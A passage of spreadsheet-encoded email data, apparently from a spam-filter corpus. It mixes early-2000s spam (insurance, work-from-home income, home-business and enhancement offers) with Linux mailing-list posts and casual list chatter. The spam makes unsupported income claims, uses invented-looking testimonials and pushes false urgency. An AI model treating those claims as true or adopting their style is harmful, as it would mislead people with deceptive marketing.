 width=3D"1" height=3D"5"&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;
           &lt;td colspan=3D"2"&gt;
             &lt;table width=3D"100%" border=3D"2" cellspacing=3D"0" =
 cellpadding=3D"0" bordercolor=3D"#000000"&gt;
               &lt;tr&gt;
                 &lt;td&gt;
                   &lt;table width=3D"100%" cellpadding=3D"2" =
 cellspacing=3D"0" border=3D"0" bgcolor=3D"#CCCCCC"&gt;
                     &lt;tr&gt;=20
                       &lt;td colspan=3D"2" bgcolor=3D"#660000"&gt;
                         &lt;font color=3D"#FFFFFF" face=3D"Verdana, Arial, =
 Helvetica, sans-serif"&gt;
                         &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;Don't forget to ask =
 about...&lt;br&gt;
                         &lt;i&gt;&lt;b&gt;&lt;font size=3D"4"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;OUR =
 FULL PORTFOLIO OF SENIOR PRODUCTS&lt;/font&gt;&lt;/b&gt;&lt;/i&gt;&lt;/font&gt;
                       &lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr align=3D"center"&gt;=20
                       &lt;td width=3D"50%"&gt;&lt;b&gt;&lt;font color=3D"#000000" =
 size=3D"2" face=3D"Verdana, Arial, Helvetica, sans-serif"&gt;LTC =
 Annuity&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                       &lt;td width=3D"50%"&gt;&lt;b&gt;&lt;font color=3D"#000000" =
 size=3D"2" face=3D"Verdana, Arial, Helvetica, sans-serif"&gt;Lead =
 Programs&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr align=3D"center"&gt;=20
                       &lt;td width=3D"50%"&gt;&lt;b&gt;&lt;font color=3D"#000000" =
 size=3D"2" face=3D"Verdana, Arial, Helvetica, sans-serif"&gt;Medicare =
 Supplement&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                       &lt;td width=3D"50%"&gt;&lt;b&gt;&lt;font color=3D"#000000" =
 size=3D"2" face=3D"Verdana, Arial, Helvetica, sans-serif"&gt;LTCI Sales =
 Training&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr align=3D"center"&gt;=20
                       &lt;td width=3D"50%"&gt;&lt;b&gt;&lt;font color=3D"#000000" =
 size=3D"2" face=3D"Verdana, Arial, Helvetica, sans-serif"&gt;Final =
 Expense&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                       &lt;td width=3D"50%"&gt;&lt;b&gt;&lt;font color=3D"#000000" =
 size=3D"2" face=3D"Verdana, Arial, Helvetica, sans-serif"&gt;Career =
 Opportunities&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                 &lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td colspan=3D"2" align=3D"center"&gt;
             &lt;b&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"2" =
 color=3D"#000000"&gt;&lt;img src=3D"spacer.gif" width=3D"1" height=3D"8"&gt;&lt;br&gt;
             Call or &lt;a href=3D"mailto:info@ltcadvantage.net"&gt;e-mail&lt;/a&gt; =
 LTC Advantage today!&lt;/font&gt;&lt;/b&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td colspan=3D"2" align=3D"center"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/LTCAdv/20020319-2.jpg" width=3D"531" =
 height=3D"88" alt=3D"877-292-8996"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td colspan=3D"2" align=3D"center"&gt;
             &lt;b&gt;&amp;#151; or &amp;#151;&lt;/b&gt;&lt;br&gt;
             &lt;img src=3D"http://63.211.81.87/images/LTCAdv/spacer.gif" =
 width=3D"1" height=3D"5"&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td colspan=3D"2" align=3D"center"&gt;=20
             &lt;table width=3D"95%" bgcolor=3D"#000000"&gt;
               &lt;tr&gt;=20
                 &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                   &lt;td&gt;=20
                     &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"2" align=3D"center" bgcolor=3D"#CCCC99"&gt;
                       &lt;tr&gt;=20
                         &lt;td colspan=3D"4" align=3D"center" =
 bgcolor=3D"#000066"&gt;&lt;b&gt;&lt;font color=3D"#FFFFFF" face=3D"Verdana, Arial, =
 Helvetica, sans-serif" size=3D"2"&gt;Please fill out the form below for =
 more information&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;Name:&lt;/font&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;=20
                           &lt;input type=3D"text" name=3D"contactname" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;E-mail:&lt;/font&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;=20
                           &lt;input type=3D"text" name=3D"email" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;Phone:&lt;/font&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;=20
                           &lt;input type=3D"text" name=3D"phone" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;City:&lt;/font&gt;&lt;/td&gt;
                         &lt;td width=3D"30%"&gt;=20
                           &lt;input type=3D"text" name=3D"city" =
 size=3D"20"&gt;
                         &lt;/td&gt;
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;State:&lt;/font&gt;&lt;/td&gt;
                         &lt;td width=3D"40%"&gt;=20
                           &lt;input type=3D"text" name=3D"state" =
 size=3D"2"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"30%"&gt;=20
                           &lt;input type=3D"submit" name=3D"btnsubmit" =
 value=3D"Submit"&gt;
                         &lt;/td&gt;
                         &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"40%"&gt;=20
                           &lt;input type=3D"hidden" =
 name=3D"hdnRecipientTxt" value=3D"info@ltcadvantage.net"&gt;
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"LTC Advantage's InsuranceIQ Ad Inquiry"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr align=3D"center"&gt;=20
           &lt;td colspan=3D"2"&gt;&lt;br&gt;
             &lt;a href=3D"http://www.ltcadvantage.net"&gt;&lt;img =
 src=3D"http://63.211.81.87/images/LTCAdv/20020319-3.gif" width=3D"477" =
 height=3D"84" border=3D"0" alt=3D"LTC Advantage: Specializing in LTCI =
 for over 15 years."&gt;&lt;/a&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;=20
     &lt;td width=3D"100%" bgcolor=3D"#cccccc" align=3D"center"&gt;=20
       &lt;p&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"1"&gt; We =
 don't want anybody=20
         to receive our mailings who does not wish to receive them. This =
 is professional=20
         communication sent to insurance professionals. To be removed =
 from this=20
         mailing list, &lt;b&gt;DO NOT REPLY&lt;/b&gt; to this message. Instead, go =
 here:
         &lt;a href=3D"http://www.InsuranceIQ.com/optout"&gt; =
 http://www.InsuranceIQ.com/optout&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_197EA3_01C2001F.877BF830--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ADV: Life Insurance - Pennies a day! -- FREE Quote cmgpk
</t>
  </si>
  <si>
    <t xml:space="preserve">Low-Cost Term-Life Insurance!
 SAVE up to 70% or more on your term life insurance policy now.
 CLICK HERE NOW For your FREE Quote!
  http://hey11.heyyy.com/insurance/
 Example: Male age 40 - $250,000 - 10 year level term - as low as $11 per month!
 If you haven't taken the time to think about what you are paying for life insurance...now is the time!!!
 We offer the lowest rates available from nationally recognized carriers.
 Act now and pay less!
 CLICK HERE 
  http://hey11.heyyy.com/insurance/
 ++++++++++++++++++++++++++++
 Simple Removal instructions:
 To be removed from our in-house list simply visit
 http://hey11.heyyy.com/removal/remove.htm
 Enter your email addresses to unsubscribe.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Returned mail: [SACVS] CVS: spamassassin/masses craig-evolve.c.ALTIVEC,NONE,1.1
</t>
  </si>
  <si>
    <t xml:space="preserve">Unable to find user: &lt;matt_relay@sbcglobal.net&gt;
 Please make sure the address is correct and resend your mail.
</t>
  </si>
  <si>
    <t xml:space="preserve">The usual crud.  Why do morons ranting and beating their chests in the
 National Review (or similar rags) merit FoRKing?
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: Information that you have requested 19275
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body alink=3D"#FFFFFF" vlink=3D"#FFFFFF" link=3D"#FFFFFF"&gt;
 &lt;div align=3D"center"&gt;
   &lt;center&gt;
 &lt;table bgColor=3D"#000000" border=3D"0" cellPadding=3D"0" cellSpacing=3D"0=
 " width=3D"596"&gt;
   &lt;tbody&gt;
     &lt;tr&gt;
       &lt;td align=3D"center" colSpan=3D"2" vAlign=3D"top" width=3D"590" bgco=
 lor=3D"#000000"&gt;
         &lt;p align=3D"center"&gt;&lt;font color=3D"#000000"&gt;&lt;font face=3D"Webdings=
 " size=3D"6"&gt;e &lt;/font&gt;&lt;b&gt;&lt;font face=3D"Verdana" size=3D"5" color=3D"#FFFFF=
 F"&gt;Earn
         &lt;/font&gt;&lt;/font&gt;&lt;font face=3D"Verdana" size=3D"5" color=3D"#FF0000"&gt;=
 $1500&lt;/font&gt;&lt;font face=3D"Verdana" size=3D"5" color=3D"#FFFFFF"&gt; Or More P=
 er Week!
         &lt;/font&gt; &lt;/b&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td colSpan=3D"2" vAlign=3D"top" width=3D"590"&gt;
         &lt;table bgColor=3D"black" border=3D"0" cellPadding=3D"0" cellSpacin=
 g=3D"0" height=3D"1" width=3D"596"&gt;
           &lt;tbody&gt;
             &lt;tr&gt;
               &lt;td&gt;&lt;img height=3D"1" width=3D"1"&gt;&lt;/td&gt;
             &lt;/tr&gt;
           &lt;/tbody&gt;
         &lt;/table&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
       &lt;td align=3D"center" bgColor=3D"#FFB13E" height=3D"17" vAlign=3D"cen=
 ter" width=3D"89"&gt;
         &lt;div align=3D"center"&gt;
           &amp;nbsp;
         &lt;/div&gt;
       &lt;/td&gt;
       &lt;td align=3D"right" bgColor=3D"#FFB13E" height=3D"17" vAlign=3D"cent=
 er" width=3D"501"&gt;
         &lt;div align=3D"center"&gt;
           &lt;b&gt;&lt;font size=3D"2" face=3D"Arial"&gt;This offer is limited to the =
 first 49
           people who contact me today!&lt;/font&gt;&lt;/b&gt;
         &lt;/div&gt;
       &lt;/td&gt;
     &lt;tr&gt;
       &lt;td align=3D"center" colSpan=3D"2" vAlign=3D"top" width=3D"590" bgco=
 lor=3D"#B0D8FF"&gt;
         &lt;table bgColor=3D"black" border=3D"0" cellPadding=3D"0" cellSpacin=
 g=3D"0" height=3D"1" width=3D"596"&gt;
           &lt;tbody&gt;
             &lt;tr&gt;
               &lt;td&gt;&lt;img height=3D"1" width=3D"1"&gt;&lt;/td&gt;
             &lt;/tr&gt;
           &lt;/tbody&gt;
         &lt;/table&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/tbody&gt;
 &lt;/table&gt;
   &lt;/center&gt;
 &lt;/div&gt;
 &lt;div align=3D"center"&gt;
   &lt;center&gt;
 &lt;table align=3D"center" border=3D"0" cellPadding=3D"0" cellSpacing=3D"0" w=
 idth=3D"596" height=3D"1" bgcolor=3D"#000000"&gt;
   &lt;tbody&gt;
     &lt;tr&gt;
       &lt;td align=3D"center" bgColor=3D"#000000" vAlign=3D"top" height=3D"11=
 8"&gt;
         &lt;div align=3D"center"&gt;
           &lt;center&gt;
         &lt;table border=3D"0" cellPadding=3D"0" cellSpacing=3D"0" bgcolor=3D=
 "#000000"&gt;
           &lt;tbody&gt;
             &lt;tr&gt;
               &lt;td width=3D"10" bgcolor=3D"#FFFF00"&gt;&lt;/td&gt;
               &lt;td align=3D"center" vAlign=3D"top" bgcolor=3D"#FFFF00"&gt;
                 &lt;p align=3D"center"&gt;&lt;br&gt;
                 &lt;font face=3D"Verdana" size=3D"2"&gt;Let's face it, every bus=
 iness
                 opportunity is not for everyone.&amp;nbsp; You need something =
 that
                 fits your needs, budget, and schedule.&amp;nbsp; That is why w=
 e have
                 put together several &lt;b&gt;&lt;font color=3D"#ff0000"&gt;&amp;quot;Real=
 &amp;quot;
                 &lt;/font&gt;Income Opportunities&lt;/b&gt;  just for you. We have sea=
 rched
                 and searched and finally found and compiled the best
                 opportunities available.&amp;nbsp;&amp;nbsp;&lt;/font&gt;&lt;/p&gt;
                 &lt;p align=3D"center"&gt;&lt;font face=3D"Verdana" size=3D"2"&gt;I pr=
 omise, you
                 will not regret it. You will finally find something you tr=
 uly
                 can make Money with.&amp;nbsp;You really can make an &lt;b&gt;Extra =
 $200
                 to $1,500 a Week&lt;/b&gt; if you have a few hours a week to wor=
 k
                 your business!&lt;/font&gt;&lt;/p&gt;
                 &lt;p align=3D"center"&gt;&lt;font face=3D"Verdana" size=3D"2"&gt;You =
 do not have to
                 pay one dime to find out about these true money making
                 opportunities.&lt;span style=3D"mso-spacerun: yes"&gt;&amp;nbsp; &lt;/s=
 pan&gt;Just
                 &lt;b&gt;Call 1(800)234-8190&lt;/b&gt; and we will show you the best, =
 &lt;b&gt;real&lt;/b&gt;
                 moneymakers available.&lt;span style=3D"mso-spacerun: yes"&gt;&amp;n=
 bsp; &lt;/span&gt;It
                 is &lt;b&gt;100% FREE&lt;/b&gt;, so visit us today, do not miss out on=
  a
                 life changing opportunity.&lt;/font&gt;&lt;/p&gt;
                 &lt;p&gt;&lt;font face=3D"Verdana" size=3D"2"&gt;This is &lt;b&gt;Absolutely=
 &lt;/b&gt; &lt;font color=3D"#ff0000"&gt;&lt;b&gt;No
                 Risk&lt;/b&gt;&lt;/font&gt;, so &lt;b&gt;Call 1(800)234-8190&lt;/b&gt; Right Now, =
 and &lt;b&gt;Find The Opportunity of A
                 Lifetime&lt;/b&gt;!&lt;/font&gt;&lt;/p&gt;
                 &lt;p&gt;&amp;nbsp;
               &lt;/td&gt;
               &lt;td width=3D"10" bgcolor=3D"#FFFF00"&gt;&lt;/td&gt;
             &lt;/tr&gt;
             &lt;tr&gt;
               &lt;td colSpan=3D"3" height=3D"10" width=3D"437" bgcolor=3D"#FF=
 FF00"&gt;
                 &lt;p align=3D"center"&gt;&lt;b&gt;&lt;/font&gt;&lt;font face=3D"Verdana" size=3D=
 "4"&gt;Call 1(800)234-8190 Immediatly&lt;b&gt;&lt;br&gt;24 Hrs / 7 Days&lt;/font&gt;&lt;/b&gt;&lt;/a&gt;&lt;/p=
 &gt;
                 &lt;p align=3D"center"&gt;&amp;nbsp;&lt;/p&gt;
               &lt;/td&gt;
             &lt;/tr&gt;
           &lt;/tbody&gt;
         &lt;/table&gt;
           &lt;/center&gt;
         &lt;/div&gt;
       &lt;/td&gt;
       &lt;td align=3D"center" bgColor=3D"#000000" vAlign=3D"top" width=3D"1" =
 height=3D"118"&gt;&amp;nbsp;&lt;/td&gt;
       &lt;td bgColor=3D"#000000" height=3D"1" rowSpan=3D"2" vAlign=3D"top" wi=
 dth=3D"150"&gt;
                                   &lt;div align=3D"center"&gt;
                                     &lt;font color=3D"#FFFFFF" size=3D"2" fac=
 e=3D"Arial"&gt;&lt;b&gt;-
                                     Testimonials -&lt;/b&gt;&lt;/font&gt;
                                   &lt;/div&gt;
                                   &lt;div align=3D"center"&gt;
                                     &amp;nbsp;
                                   &lt;/div&gt;
                                   &lt;div align=3D"center"&gt;
                                     &lt;font size=3D"2" face=3D"Arial" color=3D=
 "#FFFFFF"&gt;&amp;quot;My very
                                     first day with less than an hour of my=
  spare
                                     time I made over $123.00. My second da=
 y I
                                     duplicated that in less than 30
                                     minutes.&amp;quot;&lt;br&gt;
                                     &lt;/font&gt;
                                   &lt;/div&gt;
                                   &lt;div align=3D"center"&gt;
                                     &lt;font size=3D"2" face=3D"Arial" color=3D=
 "#FFFFFF"&gt;Jason Vielhem&lt;/font&gt;
                                   &lt;/div&gt;
                                   &lt;div align=3D"center"&gt;
                                     &lt;font size=3D"2" face=3D"Arial" color=3D=
 "#FFFFFF"&gt;&amp;quot;Mr.
                                     Skeptical&amp;quot;&lt;/font&gt;
                                   &lt;/div&gt;
                                   &lt;div align=3D"center"&gt;
                                     &lt;font color=3D"#FFFFFF"&gt;&lt;b&gt;-----------=
 ----&lt;/b&gt;&lt;/font&gt;
                                   &lt;/div&gt;
                                   &lt;div align=3D"center"&gt;
                                     &amp;nbsp;
                                   &lt;/div&gt;
                                   &lt;div align=3D"center"&gt;
                                     &lt;font size=3D"2" face=3D"Arial" color=3D=
 "#FFFFFF"&gt;&amp;quot;I
                                     literally make thousands each month fr=
 om the
                                     comfort of my home, heck my couch! Tha=
 nk you
                                     for changing my life forever!&amp;quot;&lt;/f=
 ont&gt;
                                   &lt;/div&gt;
                                   &lt;div align=3D"center"&gt;
                                     &amp;nbsp;
                                   &lt;/div&gt;
                                   &lt;div align=3D"center"&gt;
                                     &lt;font size=3D"2" face=3D"Arial" color=3D=
 "#FFFFFF"&gt;Jenna Wilson&lt;/font&gt;
                                   &lt;/div&gt;
         &lt;p align=3D"center"&gt;&lt;font color=3D"#FFFFFF"&gt;&lt;b&gt;---------------&lt;/b&gt;=
 &lt;/font&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/tbody&gt;
 &lt;/table&gt;
   &lt;/center&gt;
 &lt;/div&gt;
 &lt;div align=3D"center"&gt;
   &lt;center&gt;
 &lt;table bgColor=3D"#000000" border=3D"0" cellPadding=3D"0" cellSpacing=3D"0=
 " width=3D"596" height=3D"1"&gt;
     &lt;tr&gt;
       &lt;td align=3D"center" bgColor=3D"#000000" height=3D"1" vAlign=3D"cent=
 er" width=3D"590"&gt;
         &lt;font face=3D"Arial" size=3D"1" color=3D"#000000"&gt;a&lt;/font&gt;
       &lt;/td&gt;
 &lt;/table&gt;
   &lt;/center&gt;
 &lt;/div&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;div align=3D"center"&gt;
   &lt;center&gt;
 &lt;table bgColor=3D"#000000" border=3D"0" cellPadding=3D"0" cellSpacing=3D"0=
 " width=3D"596" height=3D"1"&gt;
     &lt;tr&gt;
       &lt;td align=3D"center" bgColor=3D"#3C3C3C" height=3D"1" vAlign=3D"cent=
 er" width=3D"590"&gt;
         &lt;p align=3D"center"&gt;&lt;font face=3D"Arial" size=3D"2" color=3D"#FFFF=
 FF"&gt;Put your email address in body of email and send email to &lt;a href=3D"m=
 ailto:vctiper@yahoo.com"&gt;here&lt;/a&gt;&lt;b&gt;&lt;/font&gt;
       &lt;/td&gt;
 &lt;/table&gt;
   &lt;/center&gt;
 &lt;/div&gt;
 &lt;br&gt;++++++++++++++
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Congradulate Birthday Boy Putin. Link to send birthday wishes via
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8259315,1717/
 Date: 2002-09-26T01:15:07+01:00
 [IMG: http://www.newsisfree.com/Images/fark/pravda.gif ([Pravda])]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 6 Figures from homeYLWLNMAN
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;/head&gt;&lt;body bgcolor=3D#FFFFFF text=3D#000000 leftmargin=3D0 to=
 pmargin=3D0 marginwidth=3D0 marginheight=3D0 link=3D#008080 vlink=3D#00CCF=
 F alink=3D#00FFFF&gt;&lt;HR color=3D#050C87 noshade width=3D531&gt;&lt;table cellpaddi=
 ng=3D5 cellspacing=3D0 border=3D0 width=3D100%&gt;&lt;tr&gt;&lt;td valign=3Dbottom ali=
 gn=3Dcenter&gt;&lt;font size=3D1 face=3Darial color=3D#000000&gt;&lt;/font&gt;&lt;center&gt;&lt;ta=
 ble width=3D600 border=3D0 cellpadding=3D0 cellspacing=3D0&gt;&lt;tr&gt;&lt;img src=3D=
 http://www.wannaberich.net/biz/img2/header1.gif width=3D600 height=3D145&gt;&lt;=
 td width=3D149 height=3D351 align=3Dleft valign=3Dtop rowspan=3D6&gt;&lt;table w=
 idth=3D149 border=3D0 cellspacing=3D0 cellpadding=3D0&gt;&lt;tr&gt;&lt;td&gt;&lt;img src=3Dh=
 ttp://www.wannaberich.net/biz/img2/index_strip.gif width=3D149 height=3D78=
 3&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width=3D600 height=3D46 align=3Dleft=
  valign=3Dtop&gt;&lt;center&gt;&lt;b&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-ser=
 if" size=3D4&gt;Let &lt;a href=3Dhttp://www.wannaberich.net/biz/&gt;&lt;b&gt;Work From Ho=
 me&lt;/b&gt;&lt;/a&gt; help you, our program has made more Millionaires than
 any other home business opportunity in existance.
 We have a proven 20 year track record and will help you succeed.&lt;/font&gt;&lt;br=
 &gt;&lt;br&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-serif"&gt;&lt;i&gt;If a former r=
 ealtor
 and former decorator&lt;br&gt;(John and Susan Peterson)&lt;br&gt;can quickly build res=
 idual checks like these...&lt;br&gt;&lt;br&gt;&amp;nbsp;&lt;/i&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;a href=3Dhttp://www.wannaberich.net/biz/&gt;&lt;img src=3Dhttp://www.wannaberic=
 h.net/biz/img2/checks.gif border=3D0 width=3D454 height=3D201&gt;&lt;/a&gt;
 &lt;b&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" size=3D5&gt;...THEN S=
 O CAN YOU!&lt;br&gt;&lt;/font&gt;&lt;font face=3D"Verdana, Arial, Helvetica, sans-serif" =
 size=3D3&gt;All you
 have to do is follow the roadmap to success,&lt;br&gt;with the AUTOMATED DIRECT =
 DATA SYSTEM.&lt;br&gt;&lt;font color=3Dred&gt;&lt;a href=3Dhttp://www.wannaberich.net/biz=
 /&gt;CLICK HERE to begin your journey.&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/center&gt;&lt;/td&gt;&lt;/t=
 r&gt;&lt;/table&gt;&lt;HR color=3D#050C87 noshade width=3D531&gt;&lt;p&gt;&lt;font size=3D3 color=3D=
 navy&gt;&lt;TABLE BORDER=3D1 ALIGN=3DCENTER&gt;&lt;TR&gt;&lt;TD&gt;If you do not desire to incu=
 r further suggestion from us, please&lt;br&gt;&lt;A HREF=3Dhttp://wannaberich.net&gt;E=
 nter here&lt;/A&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/p&gt;&lt;/BODY&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Inn Share wrote:
 &gt; Hi,all:
 &gt; 
 &gt; Does anyone know how to list the biggest file in my
 &gt; root directory?or the second biggest ..etc...
 &gt; 
 &gt; Because I want to find out what is the reason cause my
 &gt; root all most full.
 &gt; 
 &gt; The system is Solaris 8 Sparc.
 &gt; 
 &gt; Thanks !!!
 I think everybody has their own version of this,
 but in case it's useful.. (only tested on Linux):
 find $* \( -type f -o -type l \) -maxdepth 1 -mindepth 1 -print0 |
 xargs -r0 du -b --max-depth 0 |
 sort -k1n |
 grep -v "^0"
 Pdraig.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [Webdev] mod_usertrack
</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks for the info AJ, I found "weblog" at 
 http://awsd.com/scripts/weblog/index.shtml which has some click-path 
 reporting. It's simple, but works. Report generation takes a bit though, even 
 with dns resolution turned off..
 Donncha.
 On Monday 07 October 2002 23:35, AJ McKee wrote:
 &gt; Donncha,
 &gt;
 &gt; I've been using mod_usertrack for a good while now. I use in by default in
 &gt; every vhost that I set up. I assign a cookie name and set the expiry for
 &gt; about a year. I have to say it looks ok. A few things to note though. If a
 _______________________________________________
 Webdev mailing list
 Webdev@linux.ie
 http://www.linux.ie/mailman/listinfo/webdev
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 13 Sep 2002 the voices made carlo@alinoe.com write:
 &gt; What do spammers do with email addresses in
 &gt; their database that are undeliverable for a
 &gt; few years?  Do they still continue to spam
 &gt; them?
  Yes.
 	/Tony
 -- 
 # Per scientiam ad libertatem! // Through knowledge towards freedom! #
 # Genom kunskap mot frihet! =*= (c) 1999-2002 tony@svanstrom.com =*= #
      perl -e'print$_{$_} for sort%_=`lynx -dump svanstrom.com/t`'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</si>
  <si>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tombrandon,Bigger, Fuller Breasts Naturally In Just Weeks
</t>
  </si>
  <si>
    <t xml:space="preserve">Jim Whitehead wrote:
 &gt; So, after shutting off the water and mopping up, I was left to ponder what
 &gt; are the odds of having mechanical failure of a large rectangular porcelain
 &gt; bowl, in the absence of any visible stressors (like someone striking it with
 &gt; a sledgehammer)? We hadn't done anything unusual to the toilet in the recent
 All it takes is an overtorqued nut (e.g. at the water intake entrance)
 to stress the porcelain, and you've got a time bomb waiting to go off.
 Of course, if you're lucky, you'll overtorque it enough that the tank
 will break right away, while you still have the water intake shut off.
 - Joe
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Ouch... [Bebergflame]
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 6 Sep 2002, Kragen Sitaker wrote:
 &gt; Adam Beberg writes:
 &gt; &gt; Shouldn't a politician know not to tell the truth? Odds he's impeached by
 &gt; 
 &gt; As the article you forwarded explained in the second line of text,
 &gt; this politician is a woman.
 &gt; 
 &gt; &gt; next Monday? [ob: no-clue-how-they-remove-mayors-in-italy]
 &gt; 
 &gt; ob: no-clue-full-stop, as in nearly all Adam Beberg posts.
 posts, or pouts?
 in rare webster form,
 C
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ADV: buyers sellers agents loans
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_75206_01C230D5.32E68290
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: 7bit
 Home for Sale? 
 List with us! &lt;http://www.clrea.com/whyusseller.cfm&gt; 
 Buying a home is an important step in your life and quite possibly the
 largest purchase you will ever make. A trustworthy and reliable agent is
 what you're looking for but often times it can be difficult to find a
 real estate agent deserving of your trust.
 Through recommendations and client evaluations we've assembled a
 national association of Christian Real Estate Agents
 &lt;http://www.clrea.com/philosophy.cfm&gt;  dedicated to fair business
 practices and the teachings of our savior.
 Christian Agents - click here to join the association
 &lt;http://www.clrea.com/assbenefits.cfm&gt; 
 Follow these easy steps &lt;http://www.clrea.com/howworkbuyers.cfm&gt;  and
 we'll take care of the rest...
 1. Describe the property you are looking using our Buyer's Information
 Form &lt;http://www.clrea.com/buyersform.cfm&gt; .
 2. Our Christian Living Real Estate Associate Agent contacts you at your
 convenience to get a better understanding of your specific real estate
 needs.
 3. Our Christian Living Real Estate Associate Agent suggests properties
 that fit your criteria and arranges for you to view the properties that
 interest you.
 4. During the decision making process, our Associate Christian Agent
 provides reliable and honest guidance to get you the best possible deal.
 5. When you've decided on a property to purchase, our agent makes all
